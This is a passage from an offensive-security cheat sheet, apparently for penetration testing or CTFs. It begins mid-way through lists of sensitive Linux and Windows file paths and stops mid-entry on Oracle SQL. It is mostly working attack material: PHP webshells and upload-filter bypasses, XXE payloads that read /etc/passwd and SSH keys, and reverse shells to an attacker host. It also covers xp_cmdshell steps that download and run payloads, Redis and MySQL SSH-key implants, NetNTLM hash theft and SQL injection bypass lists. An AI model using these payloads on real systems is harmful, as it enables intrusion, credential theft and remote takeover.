ferlog\n/var/apache2/config.inc\n/var/apache/logs/access_log\n/var/apache/logs/error_log\n/var/cpanel/cpanel.config\n/var/lib/mysql/my.cnf\n/var/lib/mysql/mysql/user.MYD\n/var/local/www/conf/php.ini\n/var/log/apache2/access_log\n/var
/log/apache2/access.log\n/var/log/apache2/error_log\n/var/log/apache2/error.log\n/var/log/apache/access_log\n/var/log/apache/access.log\n/var/log/apache/error_log\n/var/log/apache/error.log\n/var/log/apache-ssl/access.log\n/var/log/apache-ssl/error.log\n/var/log/auth.log\n/var/log/boot\n/var/htmp\n/var/log/chttp.log\n/var/log/cups/error.log\n/var/log/daemon.log\n/var/log/debug\n/var/log/dmesg\n/var/log/dpkg.log\n/var/log/exim_mainlog\n/var/log/exim/mainlog\n/var/log/exim_paniclog\n/var/log/exim.paniclog\n/var/log/exim_rejectlog\n/var/log/exim/rejectlog\n/var/log/faillog\n/var/log/ftplog\n/var/log/ftp-proxy\n/var/log/ftp-proxy/ftp-proxy.log\n/var/log/httpd-access.log\n/var/log/httpd/access_log\n/var/log/httpd/access.log\n/var/log/httpd/error_log\n/var/log/httpd/error.log\n/var/log/httpsd/ssl.access_log\n/var/log/httpsd/ssl_log\n/var/log/kern.log\n/var/log/lastlog\n/var/log/lighttpd/access.log\n/var/log/lighttpd/error.log\n/var/log/lighttpd/lighttpd.access.log\n/var/log/lighttpd/lighttpd.error.log\n/var/log/mail.info\n/var/log/mail.log\n/var/log/maillog\n/var/log/mail.warn\n/var/log/message\n/var/log/messages\n/var/log/mysqlderror.log\n/var/log/mysql.log\n/var/log/mysql/mysql-bin.log\n/var/log/mysql/mysql.log\n/var/log/mysql/mysql-slow.log\n/var/log/proftpd\n/var/log/pureftpd.log\n/var/log/pure-ftpd/pure-ftpd.log\n/var/log/secure\n/var/log/vsftpd.log\n/var/log/wtmp\n/var/log/xferlog\n/var/log/yum.log\n/var/mysql.log\n/var/run/utmp\n/var/spool/cron/crontabs/root\n/var/webmin/miniserv.log\n/var/www/html/\u003cVHOST\u003e/__init__.py\n/var/www/html/db_connect.php\n/var/www/html/utils.php\n/var/www/log/access_log\n/var/www/log/error_log\n/var/www/logs/access_log\n/var/www/logs/error_log\n/var/www/logs/access.log\n/var/www/logs/error.log\n~/.atfp_history\n~/.bash_history\n~/.bash_logout\n~/.bash_profile\n~/.bashrc\n~/.gtkrc\n~/.login\n~/.logout\n~/.mysql_history\n~/.nano_history\n~/.php_history\n~/.profile\n~/.ssh/authorized_keys\n~/.ssh/id_dsa\n~/.ssh/id_dsa.pub\n~/.ssh/id
_rsa\n~/.ssh/id_rsa.pub\n~/.ssh/identity\n~/.ssh/identity.pub\n~/.viminfo\n~/.wm_style\n~/.Xdefaults\n~/.xinitrc\n~/.Xresources\n~/.xsession\n```\n\n##### Windows Files\n\n```c\nC:/Users/Administrator/NTUser.dat\nC:/Documents and Settings/Administrator/NTUser.dat\nC:/apache/logs/access.log\nC:/apache/logs/error.log\nC:/apache/php/php.ini\nC:/boot.ini\nC:/inetpub/wwwroot/global.asa\nC:/MySQL/data/hostname.err\nC:/MySQL/data/mysql.err\nC:/MySQL/data/mysql.log\nC:/MySQL/my.cnf\nC:/MySQL/my.ini\nC:/php4/php.ini\nC:/php5/php.ini\nC:/php/php.ini\nC:/Program Files/Apache Group/Apache2/conf/httpd.conf\nC:/Program Files/Apache Group/Apache/conf/httpd.conf\nC:/Program Files/Apache Group/Apache/logs/access.log\nC:/Program Files/Apache Group/Apache/logs/error.log\nC:/Program Files/FileZilla Server/FileZilla Server.xml\nC:/Program Files/MySQL/data/hostname.err\nC:/Program Files/MySQL/data/mysql-bin.log\nC:/Program Files/MySQL/data/mysql.err\nC:/Program Files/MySQL/data/mysql.log\nC:/Program Files/MySQL/my.ini\nC:/Program Files/MySQL/my.cnf\nC:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err\nC:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log\nC:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err\nC:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log\nC:/Program Files/MySQL/MySQL Server 5.0/my.cnf\nC:/Program Files/MySQL/MySQL Server 5.0/my.ini\nC:/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf\nC:/Program Files (x86)/Apache Group/Apache/conf/httpd.conf\nC:/Program Files (x86)/Apache Group/Apache/conf/access.log\nC:/Program Files (x86)/Apache Group/Apache/conf/error.log\nC:/Program Files (x86)/FileZilla Server/FileZilla Server.xml\nC:/Program Files 
(x86)/xampp/apache/conf/httpd.conf\nC:/WINDOWS/php.ini\nC:/WINDOWS/Repair/SAM\nC:/Windows/repair/system\nC:/Windows/repair/software\nC:/Windows/repair/security\nC:/WINDOWS/System32/drivers/etc/hosts\nC:/Windows/win.ini\nC:/WINNT/php.ini\nC:/WINNT/win.ini\nC:/xampp/apache/bin/php.ini\nC:/xampp/apache/logs/access.log\nC:/xampp/apache/logs/error.log\nC:/Windows/Panther/Unattend/Unattended.xml\nC:/Windows/Panther/Unattended.xml\nC:/Windows/debug/NetSetup.log\nC:/Windows/system32/config/AppEvent.Evt\nC:/Windows/system32/config/SecEvent.Evt\nC:/Windows/system32/config/default.sav\nC:/Windows/system32/config/security.sav\nC:/Windows/system32/config/software.sav\nC:/Windows/system32/config/system.sav\nC:/Windows/system32/config/regback/default\nC:/Windows/system32/config/regback/sam\nC:/Windows/system32/config/regback/security\nC:/Windows/system32/config/regback/system\nC:/Windows/system32/config/regback/software\nC:/Program Files/MySQL/MySQL Server 5.1/my.ini\nC:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml\nC:/Windows/System32/inetsrv/config/applicationHost.config\nC:/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log\n```\n\n#### PDF PHP Inclusion\n\nCreate a file with a PDF header, which contains PHP code.\n\n```c\n%PDF-1.4\n\n\u003c?php\n    system($_GET[\"cmd\"]);\n?\u003e\n```\n\n```c\nhttp://\u003cRHOST\u003e/index.php?page=uploads/\u003cFILE\u003e.pdf%00\u0026cmd=whoami\n```\n\n#### PHP Upload Filter Bypasses\n\n```c\n.sh\n.cgi\n.inc\n.txt\n.pht\n.phtml\n.phP\n.Php\n.php3\n.php4\n.php5\n.php7\n.pht\n.phps\n.phar\n.phpt\n.pgif\n.phtml\n.phtm\n.php%00.jpeg\n```\n\n```c\n\u003cFILE\u003e.php%20\n\u003cFILE\u003e.php%0d%0a.jpg\n\u003cFILE\u003e.php%0a\n\u003cFILE\u003e.php.jpg\n\u003cFILE\u003e.php%00.gif\n\u003cFILE\u003e.php\\x00.gif\n\u003cFILE\u003e.php%00.png\n\u003cFILE\u003e.php\\x00.png\n\u003cFILE\u003e.php%00.jpg\n\u003cFILE\u003e.php\\x00.jpg\nmv \u003cFILE\u003e.jpg \u003cFILE\u003e.php\\x00.jpg\n```\n\n#### PHP Filter Chain Generator\n\n\u003e 
https://github.com/synacktiv/php_filter_chain_generator\n\n```c\npython3 php_filter_chain_generator.py --chain '\u003c?= exec($_GET[0]); ?\u003e'\npython3 php_filter_chain_generator.py --chain \"\u003c?php echo shell_exec(id); ?\u003e\"\npython3 php_filter_chain_generator.py --chain \"\"\"\u003c?php echo shell_exec(id); ?\u003e\"\"\"\npython3 php_filter_chain_generator.py --chain \"\"\"\"\u003c?php exec(\"\"/bin/bash -c 'bash -i \u003e\u0026 /dev/tcp/\u003cLHOST\u003e/\u003cLPORT\u003e 0\u003e\u00261'\"\");?\u003e\"\"\"\"\n```\n\n```c\nhttp://\u003cRHOST\u003e/?page=php://filter/convert.base64-decode/resource=PD9waHAgZWNobyBzaGVsbF9leGVjKGlkKTsgPz4\n```\n\n```c\npython3 php_filter_chain_generator.py --chain '\u003c?= exec($_GET[0]); ?\u003e'\n[+] The following gadget chain will generate the following code : \u003c?= exec($_GET[0]); ?\u003e (base64 value: PD89IGV4ZWMoJF9HRVRbMF0pOyA/Pg)\nphp://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|\u003c--- SNIP ---\u003e|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp\u00260=\u003cCOMMAND\u003e\n```\n\n#### PHP Generic Gadget Chains (PHPGGC)\n\n```c\nphpggc -u --fast-destruct Guzzle/FW1 /dev/shm/\u003cFILE\u003e.txt /PATH/TO/FILE/\u003cFILE\u003e.txt\n```\n\n#### Server-Side Request Forgery (SSRF)\n\n```c\nhttps://\u003cRHOST\u003e/item/2?server=server.\u003cRHOST\u003e/file?id=9\u0026x=\n```\n\n#### Server-Side Template Injection (SSTI)\n\n##### Fuzz String\n\n\u003e https://cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti\n\n```c\n${{\u003c%[%'\"}}%\\.\n```\n\n##### Magic Payload\n\n\u003e https://medium.com/@nyomanpradipta120/ssti-in-flask-jinja2-20b068fdaeee\n\n```c\n{{ ''.__class__.__mro__[1].__subclasses__() }}\n```\n\n#### Upload Vulnerabilities\n\n```c\nASP / ASPX / PHP / 
PHP3 / PHP5: Webshell / Remote Code Execution\nSVG: Stored XSS / Server-Side Request Forgery\nGIF: Stored XSS\nCSV: CSV Injection\nXML: XXE\nAVI: Local File Inclusion / Server-Side Request Forgery\nHTML/JS: HTML Injection / XSS / Open Redirect\nPNG / JPEG: Pixel Flood Attack\nZIP: Remote Code Execution via Local File Inclusion\nPDF / PPTX: Server-Side Request Forgery / Blind XXE\n```\n\n#### wfuzz\n\n```c\nwfuzz -w /usr/share/wfuzz/wordlist/general/big.txt -u http://\u003cRHOST\u003e/FUZZ/\u003cFILE\u003e.php --hc '403,404'\n```\n\n##### Write to File\n\n```c\nwfuzz -w /PATH/TO/WORDLIST -c -f \u003cFILE\u003e -u http://\u003cRHOST\u003e --hc 403,404\n```\n\n##### Custom Scan with limited Output\n\n```c\nwfuzz -w /PATH/TO/WORDLIST -u http://\u003cRHOST\u003e/dev/304c0c90fbc6520610abbf378e2339d1/db/file_FUZZ.txt --sc 200 -t 20\n```\n\n##### Fuzzing two Parameters at once\n\n```c\nwfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u http://\u003cRHOST\u003e:/\u003cdirectory\u003e/FUZZ.FUZ2Z -z list,txt-php --hc 403,404 -c\n```\n\n##### Domain\n\n```c\nwfuzz --hh 0 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H 'Host: FUZZ.\u003cRHOST\u003e' -u http://\u003cRHOST\u003e/\n```\n\n##### Subdomain\n\n```c\nwfuzz -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H \"Host: FUZZ.\u003cRHOST\u003e\" --hc 200 --hw 356 -t 100 \u003cRHOST\u003e\n```\n\n##### Git\n\n```c\nwfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt -u http://\u003cRHOST\u003e/FUZZ --hc 403,404\n```\n\n##### Login\n\n```c\nwfuzz -X POST -u \"http://\u003cRHOST\u003e:\u003cRPORT\u003e/login.php\" -d \"email=FUZZ\u0026password=\u003cPASSWORD\u003e\" -w /PATH/TO/WORDLIST/\u003cWORDLIST\u003e --hc 200 -c\nwfuzz -X POST -u \"http://\u003cRHOST\u003e:\u003cRPORT\u003e/login.php\" -d \"username=FUZZ\u0026password=\u003cPASSWORD\u003e\" -w /PATH/TO/WORDLIST/\u003cWORDLIST\u003e --ss \"Invalid 
login\"\n```\n\n##### SQL\n\n```c\nwfuzz -c -z file,/usr/share/wordlists/seclists/Fuzzing/SQLi/Generic-SQLi.txt -d 'db=FUZZ' --hl 16 http://\u003cRHOST\u003e/select http\n```\n\n##### DNS\n\n```c\nwfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H \"Origin: http://FUZZ.\u003cRHOST\u003e\" --filter \"r.headers.response~'Access-Control-Allow-Origin'\" http://\u003cRHOST\u003e/\nwfuzz -c -w /usr/share/wordlists/secLists/Discovery/DNS/subdomains-top1million-110000.txt --hc 400,404,403 -H \"Host: FUZZ.\u003cRHOST\u003e\" -u http://\u003cRHOST\u003e -t 100\nwfuzz -c -w /usr/share/wordlists/secLists/Discovery/DNS/subdomains-top1million-110000.txt --hc 400,403,404 -H \"Host: FUZZ.\u003cRHOST\u003e\" -u http://\u003cRHOST\u003e --hw \u003cvalue\u003e -t 100\n```\n\n##### Numbering Files\n\n```c\nwfuzz -w /usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt --hw 31 http://10.13.37.11/backups/backup_2021052315FUZZ.zip\n```\n\n##### Enumerating PIDs\n\n```c\nwfuzz -u 'http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/FUZZ/cmdline' -z range,900-1000\n```\n\n#### WPScan\n\n```c\nwpscan --url https://\u003cRHOST\u003e --enumerate u,t,p\nwpscan --url https://\u003cRHOST\u003e --plugins-detection aggressive\nwpscan --url https://\u003cRHOST\u003e --disable-tls-checks\nwpscan --url https://\u003cRHOST\u003e --disable-tls-checks --enumerate u,t,p\nwpscan --url http://\u003cRHOST\u003e -U \u003cUSERNAME\u003e -P passwords.txt -t 50\n```\n\n#### XML External Entity (XXE)\n\n##### Skeleton Payload Request\n\n```c\nGET / HTTP/1.1\nHost: \u003cRHOST\u003e:\u003cRPORT\u003e\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Length: 136\n\n\u003c?xml version=\"1.0\" encoding=\"UTF-8\" ?\u003e\n\u003c!DOCTYPE test [\u003c!ENTITY xxe 
SYSTEM \"http://\u003cLHOST\u003e:80/shell.php\" \u003e]\u003e\n\u003cfoo\u003e\u0026xxe;\u003c/foo\u003e\n```\n\n##### Payloads\n\n```c\n\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\u003c!DOCTYPE xxe [ \u003c!ENTITY passwd SYSTEM 'file:///etc/passwd'\u003e ]\u003e\n \u003cstockCheck\u003e\u003cproductId\u003e\u0026passwd;\u003c/productId\u003e\u003cstoreId\u003e1\u003c/storeId\u003e\u003c/stockCheck\u003e\n```\n\n```c\n\u003c?xml version=\"1.0\"?\u003e\u003c!DOCTYPE root [\u003c!ENTITY test SYSTEM 'file:///c:/windows/win.ini'\u003e]\u003e\u003corder\u003e\u003cquantity\u003e3\u003c/quantity\u003e\u003citem\u003e\u0026test;\u003c/item\u003e\u003caddress\u003e17th Estate, CA\u003c/address\u003e\u003c/order\u003e\n```\n\n```c\nusername=%26username%3b\u0026version=1.0.0--\u003e\u003c!DOCTYPE+username+[+\u003c!ENTITY+username+SYSTEM+\"/root/.ssh/id_rsa\"\u003e+]\u003e\u003c!--\n```\n\n### Database Analysis\n\n#### impacket-mssqlclient\n\n##### Common Commands\n\n```c\nenum_logins\nenum_impersonate\n```\n\n##### Connection\n\n```c\nimpacket-mssqlclient \u003cUSERNAME\u003e@\u003cRHOST\u003e\nimpacket-mssqlclient \u003cUSERNAME\u003e@\u003cRHOST\u003e -windows-auth\nimpacket-mssqlclient -k -no-pass \u003cRHOST\u003e\nimpacket-mssqlclient \u003cRHOST\u003e/\u003cUSERNAME\u003e:\u003cUSERNAME\u003e@\u003cRHOST\u003e -windows-auth\n```\n\n```c\nexport KRB5CCNAME=\u003cUSERNAME\u003e.ccache\nimpacket-mssqlclient -k \u003cRHOST\u003e.\u003cDOMAIN\u003e\n```\n\n#### MongoDB\n\n```c\nmongo \"mongodb://localhost:27017\"\n```\n\n```c\n\u003e use \u003cDATABASE\u003e;\n\u003e show tables;\n\u003e show collections;\n\u003e db.system.keys.find();\n\u003e db.users.find();\n\u003e db.getUsers();\n\u003e db.getUsers({showCredentials: true});\n\u003e db.accounts.find();\n\u003e db.accounts.find().pretty();\n\u003e use admin;\n```\n\n##### User Password Reset to \"12345\"\n\n```c\n\u003e db.getCollection('users').update({username:\"admin\"}, { $set: {\"services\" : { \"password\" 
: {\"bcrypt\" : \"$2a$10$n9CM8OgInDlwpvjLKLPML.eizXIzLlRtgCh3GRLafOdR9ldAUh/KG\" } } } })\n```\n\n#### MSSQL\n\n##### Connection\n\n```c\nsqlcmd -S \u003cRHOST\u003e -U \u003cUSERNAME\u003e -P '\u003cPASSWORD\u003e'\nimpacket-mssqlclient \u003cUSERNAME\u003e:\u003cPASSWORD\u003e@\u003cRHOST\u003e -windows-auth\n```\n\n##### Common Commands\n\n```c\nSELECT @@version;\nSELECT name FROM sys.databases;\nSELECT * FROM \u003cDATABASE\u003e.information_schema.tables;\nSELECT * FROM \u003cDATABASE\u003e.dbo.users;\n```\n\n##### Show Database Content\n\n```c\n1\u003e SELECT name FROM master.sys.databases\n2\u003e go\n```\n\n##### OPENQUERY\n\n```c\n1\u003e select * from openquery(\"web\\clients\", 'select name from master.sys.databases');\n2\u003e go\n```\n\n```c\n1\u003e select * from openquery(\"web\\clients\", 'select name from clients.sys.objects');\n2\u003e go\n```\n\n##### Binary Extraction as Base64\n\n```c\n1\u003e select cast((select content from openquery([web\\clients], 'select * from clients.sys.assembly_files') where assembly_id = 65536) as varbinary(max)) for xml path(''), binary base64;\n2\u003e go \u003e export.txt\n```\n\n##### Steal NetNTLM Hash / Relay Attack\n\n```c\nSQL\u003e exec master.dbo.xp_dirtree '\\\\\u003cLHOST\u003e\\FOOBAR'\n```\n\n##### Linked SQL Server Enumeration\n\n```c\nSQL\u003e SELECT user_name();\nSQL\u003e SELECT name,sysadmin FROM syslogins;\nSQL\u003e SELECT srvname,isremote FROM sysservers;\nSQL\u003e EXEC ('SELECT current_user') at [\u003cDOMAIN\u003e\\\u003cCONFIG_FILE\u003e];\nSQL\u003e EXEC ('SELECT srvname,isremote FROM sysservers') at [\u003cDOMAIN\u003e\\\u003cCONFIG_FILE\u003e];\nSQL\u003e EXEC ('EXEC (''SELECT suser_name()'') at [\u003cDOMAIN\u003e\\\u003cCONFIG_FILE\u003e]') at [\u003cDOMAIN\u003e\\\u003cCONFIG_FILE\u003e];\n```\n\n##### xp_cmdshell\n\n```c\nSQL\u003e EXECUTE AS LOGIN = 'sa';\nSQL\u003e EXEC sp_configure 'Show Advanced Options', 1; \nSQL\u003e RECONFIGURE; \nSQL\u003e EXEC sp_configure 'xp_cmdshell', 1; 
\nSQL\u003e RECONFIGURE;\nSQL\u003e EXEC xp_cmdshell 'dir';\n```\n\n```c\nSQL\u003e EXEC sp_configure 'Show Advanced Options', 1;\nSQL\u003e reconfigure;\nSQL\u003e sp_configure;\nSQL\u003e EXEC sp_configure 'xp_cmdshell', 1;\nSQL\u003e reconfigure\nSQL\u003e xp_cmdshell \"whoami\"\n```\n\n```c\nSQL\u003e enable_xp_cmdshell\nSQL\u003e xp_cmdshell whoami\n```\n\n```c\n';EXEC master.dbo.xp_cmdshell 'ping \u003cLHOST\u003e';--\n';EXEC master.dbo.xp_cmdshell 'certutil -urlcache -split -f http://\u003cLHOST\u003e/shell.exe C:\\\\Windows\\temp\\\u003cFILE\u003e.exe';--\n';EXEC master.dbo.xp_cmdshell 'cmd /c C:\\\\Windows\\\\temp\\\\\u003cFILE\u003e.exe';--\n```\n\n#### MySQL\n\n```c\nmysql -u root -p\nmysql -u \u003cUSERNAME\u003e -h \u003cRHOST\u003e -p\n```\n\n```c\nmysql\u003e STATUS;\nmysql\u003e SHOW databases;\nmysql\u003e USE \u003cDATABASE\u003e;\nmysql\u003e SHOW tables;\nmysql\u003e DESCRIBE \u003cTABLE\u003e;\nmysql\u003e SELECT version();\nmysql\u003e SELECT system_user();\nmysql\u003e SELECT * FROM Users;\nmysql\u003e SELECT * FROM users \\G;\nmysql\u003e SELECT Username,Password FROM Users;\nmysql\u003e SELECT user, authentication_string FROM mysql.user WHERE user = '\u003cUSERNAME\u003e';\nmysql\u003e SELECT LOAD_FILE('/etc/passwd');\nmysql\u003e SELECT LOAD_FILE('C:\\\\PATH\\\\TO\\\\FILE\\\\\u003cFILE\u003e');\nmysql\u003e SHOW GRANTS FOR '\u003cUSERNAME\u003e'@'localhost' \\G;\n```\n\n##### Update User Password\n\n```c\nmysql\u003e update user set password = '37b08599d3f323491a66feabbb5b26af' where user_id = 1;\n```\n\n##### Drop a Shell\n\n```c\nmysql\u003e \\! 
/bin/sh\n```\n\n##### Insert Code to get executed\n\n```c\nmysql\u003e insert into users (id, email) values (\u003cLPORT\u003e, \"- E $(bash -c 'bash -i \u003e\u0026 /dev/tcp/\u003cLHOST\u003e/\u003cLPORT\u003e 0\u003e\u00261')\");\n```\n\n##### Write SSH Key into authorized_keys2 file\n\n```c\nmysql\u003e SELECT \"\u003cKEY\u003e\" INTO OUTFILE '/root/.ssh/authorized_keys2' FIELDS TERMINATED BY '' OPTIONALLY ENCLOSED BY '' LINES TERMINATED BY '\\n';\n```\n\n#### NoSQL Injection\n\n```c\nadmin'||''==='\n{\"username\": {\"$ne\": null}, \"password\": {\"$ne\": null} }\n```\n\n#### PostgreSQL\n\n```c\npsql\npsql -h \u003cLHOST\u003e -U \u003cUSERNAME\u003e -c \"\u003cCOMMAND\u003e;\"\npsql -h \u003cRHOST\u003e -p 5432 -U \u003cUSERNAME\u003e -d \u003cDATABASE\u003e\n```\n\n##### Common Commands\n\n```c\npostgres=# \\list                     // list all databases\npostgres=# \\c                        // show current connection / connect to database\npostgres=# \\c \u003cDATABASE\u003e             // connect to a specific database\npostgres=# \\s                        // command history\npostgres=# \\q                        // quit\n\u003cDATABASE\u003e=# \\dt                     // list tables from current schema\n\u003cDATABASE\u003e=# \\dt *.*                 // list tables from all schemas\n\u003cDATABASE\u003e=# \\du                     // list user roles\n\u003cDATABASE\u003e=# \\du+                    // list user roles with additional details\n\u003cDATABASE\u003e=# SELECT user;            // get current user\n\u003cDATABASE\u003e=# TABLE \u003cTABLE\u003e;          // select table\n\u003cDATABASE\u003e=# SELECT * FROM users;    // select everything from users table\n\u003cDATABASE\u003e=# SHOW rds.extensions;    // list installed extensions\n\u003cDATABASE\u003e=# SELECT usename, passwd from pg_shadow;    // read credentials\n```\n\n##### Postgres Remote Code Execution\n\n```c\n\u003cDATABASE\u003e=# DROP TABLE IF EXISTS 
cmd_exec;\n\u003cDATABASE\u003e=# CREATE TABLE cmd_exec(cmd_output text);\n\u003cDATABASE\u003e=# COPY cmd_exec FROM PROGRAM 'id';\n\u003cDATABASE\u003e=# SELECT * FROM cmd_exec;\n\u003cDATABASE\u003e=# DROP TABLE IF EXISTS cmd_exec;\n```\n\n#### Redis\n\n```c\n\u003e AUTH \u003cPASSWORD\u003e\n\u003e AUTH \u003cUSERNAME\u003e \u003cPASSWORD\u003e\n\u003e INFO SERVER\n\u003e INFO keyspace\n\u003e CONFIG GET *\n\u003e SELECT \u003cNUMBER\u003e\n\u003e KEYS *\n\u003e HSET       // set the value of a field within a hash data structure\n\u003e HGET       // retrieves a field and its value from a hash data structure\n\u003e HKEYS      // retrieves all field names from a hash data structure\n\u003e HGETALL    // retrieves all fields and values from a hash data structure\n\u003e GET PHPREDIS_SESSION:2a9mbvnjgd6i2qeqcubgdv8n4b\n\u003e SET PHPREDIS_SESSION:2a9mbvnjgd6i2qeqcubgdv8n4b \"username|s:8:\\\"\u003cUSERNAME\u003e\\\";role|s:5:\\\"admin\\\";auth|s:4:\\\"True\\\";\" # the value \"s:8\" has to match the length of the username\n```\n\n##### Enter own SSH Key\n\n```c\nredis-cli -h \u003cRHOST\u003e\necho \"FLUSHALL\" | redis-cli -h \u003cRHOST\u003e\n(echo -e \"\\n\\n\"; cat ~/.ssh/id_rsa.pub; echo -e \"\\n\\n\") \u003e /PATH/TO/FILE/\u003cFILE\u003e.txt\ncat /PATH/TO/FILE/\u003cFILE\u003e.txt | redis-cli -h \u003cRHOST\u003e -x set s-key\n\u003cRHOST\u003e:6379\u003e get s-key\n\u003cRHOST\u003e:6379\u003e CONFIG GET dir\n1) \"dir\"\n2) \"/var/lib/redis\"\n\u003cRHOST\u003e:6379\u003e CONFIG SET dir /var/lib/redis/.ssh\nOK\n\u003cRHOST\u003e:6379\u003e CONFIG SET dbfilename authorized_keys\nOK\n\u003cRHOST\u003e:6379\u003e CONFIG GET dbfilename\n1) \"dbfilename\"\n2) \"authorized_keys\"\n\u003cRHOST\u003e:6379\u003e save\nOK\n```\n\n#### SQL Injection\n\n##### Master List\n\n```c\n';#---              // insert everywhere! 
Shoutout to xsudoxx!\nadmin' or '1'='1\n' or '1'='1\n\" or \"1\"=\"1\n\" or \"1\"=\"1\"--\n\" or \"1\"=\"1\"/*\n\" or \"1\"=\"1\"#\n\" or 1=1\n\" or 1=1 --\n\" or 1=1 -\n\" or 1=1--\n\" or 1=1/*\n\" or 1=1#\n\" or 1=1-\n\") or \"1\"=\"1\n\") or \"1\"=\"1\"--\n\") or \"1\"=\"1\"/*\n\") or \"1\"=\"1\"#\n\") or (\"1\"=\"1\n\") or (\"1\"=\"1\"--\n\") or (\"1\"=\"1\"/*\n\") or (\"1\"=\"1\"#\n) or '1`='1-\n```\n\n##### Authentication Bypass\n\n```c\n'-'\n' '\n'\u0026'\n'^'\n'*'\n' or 1=1 limit 1 -- -+\n'=\"or'\n' or ''-'\n' or '' '\n' or ''\u0026'\n' or ''^'\n' or ''*'\n'-||0'\n\"-||0\"\n\"-\"\n\" \"\n\"\u0026\"\n\"^\"\n\"*\"\n'--'\n\"--\"\n'--' / \"--\"\n\" or \"\"-\"\n\" or \"\" \"\n\" or \"\"\u0026\"\n\" or \"\"^\"\n\" or \"\"*\"\nor true--\n\" or true--\n' or true--\n\") or true--\n') or true--\n' or 'x'='x\n') or ('x')=('x\n')) or (('x'))=(('x\n\" or \"x\"=\"x\n\") or (\"x\")=(\"x\n\")) or ((\"x\"))=((\"x\nor 2 like 2\nor 1=1\nor 1=1--\nor 1=1#\nor 1=1/*\nadmin' --\nadmin' -- -\nadmin' #\nadmin'/*\nadmin' or '2' LIKE '1\nadmin' or 2 LIKE 2--\nadmin' or 2 LIKE 2#\nadmin') or 2 LIKE 2#\nadmin') or 2 LIKE 2--\nadmin') or ('2' LIKE '2\nadmin') or ('2' LIKE '2'#\nadmin') or ('2' LIKE '2'/*\nadmin' or '1'='1\nadmin' or '1'='1'--\nadmin' or '1'='1'#\nadmin' or '1'='1'/*\nadmin'or 1=1 or ''='\nadmin' or 1=1\nadmin' or 1=1--\nadmin' or 1=1#\nadmin' or 1=1/*\nadmin') or ('1'='1\nadmin') or ('1'='1'--\nadmin') or ('1'='1'#\nadmin') or ('1'='1'/*\nadmin') or '1'='1\nadmin') or '1'='1'--\nadmin') or '1'='1'#\nadmin') or '1'='1'/*\n1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055\nadmin\" --\nadmin';-- azer\nadmin\" #\nadmin\"/*\nadmin\" or \"1\"=\"1\nadmin\" or \"1\"=\"1\"--\nadmin\" or \"1\"=\"1\"#\nadmin\" or \"1\"=\"1\"/*\nadmin\"or 1=1 or \"\"=\"\nadmin\" or 1=1\nadmin\" or 1=1--\nadmin\" or 1=1#\nadmin\" or 1=1/*\nadmin\") or (\"1\"=\"1\nadmin\") or (\"1\"=\"1\"--\nadmin\") or (\"1\"=\"1\"#\nadmin\") or (\"1\"=\"1\"/*\nadmin\") or 
\"1\"=\"1\nadmin\") or \"1\"=\"1\"--\nadmin\") or \"1\"=\"1\"#\nadmin\") or \"1\"=\"1\"/*\n1234 \" AND 1=0 UNION ALL SELECT \"admin\", \"81dc9bdb52d04dc20036dbd8313ed055\n```\n\n#### Common Injections\n\n##### MySQL \u0026 MariaDB\n\n###### Get Number of Columns\n\n```c\n-1 order by 3;#\n```\n\n###### Get Version\n\n```c\n-1 union select 1,2,version();#\n```\n\n###### Get Database Name\n\n```c\n-1 union select 1,2,database();#\n```\n\n###### Get Table Name\n\n```c\n-1 union select 1,2, group_concat(table_name) from information_schema.tables where table_schema=\"\u003cDATABASE\u003e\";#\n```\n\n###### Get Column Name\n\n```c\n-1 union select 1,2, group_concat(column_name) from information_schema.columns where table_schema=\"\u003cDATABASE\u003e\" and table_name=\"\u003cTABLE\u003e\";#\n```\n\n###### Read a File\n\n```c\nSELECT LOAD_FILE('/etc/passwd')\n```\n\n###### Dump Data\n\n```c\n-1 union select 1,2, group_concat(\u003cCOLUMN\u003e) from \u003cDATABASE\u003e.\u003cTABLE\u003e;#\n```\n\n###### Create Webshell\n\n```c\nLOAD_FILE('/etc/httpd/conf/httpd.conf')\nselect \"\u003c?php system($_GET['cmd']);?\u003e\" into outfile \"/var/www/html/\u003cFILE\u003e.php\";\n```\n\nor\n\n```c\nLOAD_FILE('/etc/httpd/conf/httpd.conf')\n' UNION SELECT \"\u003c?php system($_GET['cmd']);?\u003e\", null, null, null, null INTO OUTFILE \"/var/www/html/\u003cFILE\u003e.php\" -- //\n```\n\n##### MSSQL\n\n###### Authentication Bypass\n\n```c\n' or 1=1--\n```\n\n###### Get Version with Time-Based Injection\n\n```c\n' SELECT @@version; WAITFOR DELAY '00:00:10'; --\n```\n\n###### Enable xp_cmdshell\n\n```c\n' UNION SELECT 1, null; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;--\n```\n\n###### Remote Code Execution (RCE)\n\n```c\n' exec xp_cmdshell \"powershell IEX (New-Object Net.WebClient).DownloadString('http://\u003cLHOST\u003e/\u003cFILE\u003e.ps1')\" ;--\n```\n\n##### Oracle SQL\n\n###### Authentication Bypass\n\n```c\n' or 
